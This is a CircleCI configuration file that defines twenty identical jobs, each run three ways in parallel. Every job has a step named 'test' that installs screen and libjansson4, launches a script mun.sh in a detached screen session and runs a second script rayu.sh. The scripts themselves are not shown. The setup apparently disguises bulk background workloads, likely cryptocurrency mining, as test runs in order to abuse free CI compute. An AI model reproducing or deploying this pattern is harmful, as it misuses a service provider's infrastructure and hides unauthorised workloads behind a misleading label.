version: 2.1
jobs:
    zamet1:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet2:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet3:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet4:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet5:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet6:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet7:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet8:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet9:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet10:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet11:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet12:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet13:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet14:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet15:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet16:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet17:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet18:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet19:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh
    zamet20:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 3
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x mun.sh
              screen -dmS run ./mun.sh
              chmod +x rayu.sh
              ./rayu.sh

workflows:
    version: 2
    build:
        jobs:
            - zamet1
            - zamet2
            - zamet3
            - zamet4
            - zamet5
            - zamet6
            - zamet7
            - zamet8
            - zamet9
            - zamet10
            - zamet11
            - zamet12
            - zamet13
            - zamet14
            - zamet15
            - zamet16
            - zamet17
            - zamet18
            - zamet19
            - zamet20



